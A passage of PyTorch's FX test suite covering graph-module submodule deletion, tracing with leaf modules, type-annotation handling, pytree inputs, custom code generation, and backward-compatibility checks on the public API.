self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_fx_stateless(self):
class MockModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(1, 1)
self.register_buffer('buffer', torch.ones(1))
def forward(self, x):
return self.l1(x) + self.buffer
module = MockModule()
x = torch.rand((1, 1))
weight = torch.tensor([[1.0]], requires_grad=True)
bias = torch.tensor([0.0], requires_grad=True)
buffer = torch.tensor([0.0])
parameters = {'l1.weight': weight,
'l1.bias': bias,
'buffer': buffer}
fx_module = torch.fx.symbolic_trace(module)
res = _stateless.functional_call(fx_module, parameters, x)
res.backward()
self.assertIsNotNone(weight.grad)
self.assertIsNotNone(bias.grad)
self.assertIsNone(buffer.grad)
# Gradient was not calculated for the module stated and buffers
self.assertIsNone(module.l1.weight.grad)
self.assertIsNone(module.l1.bias.grad)
self.assertIsNone(module.buffer.grad)
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
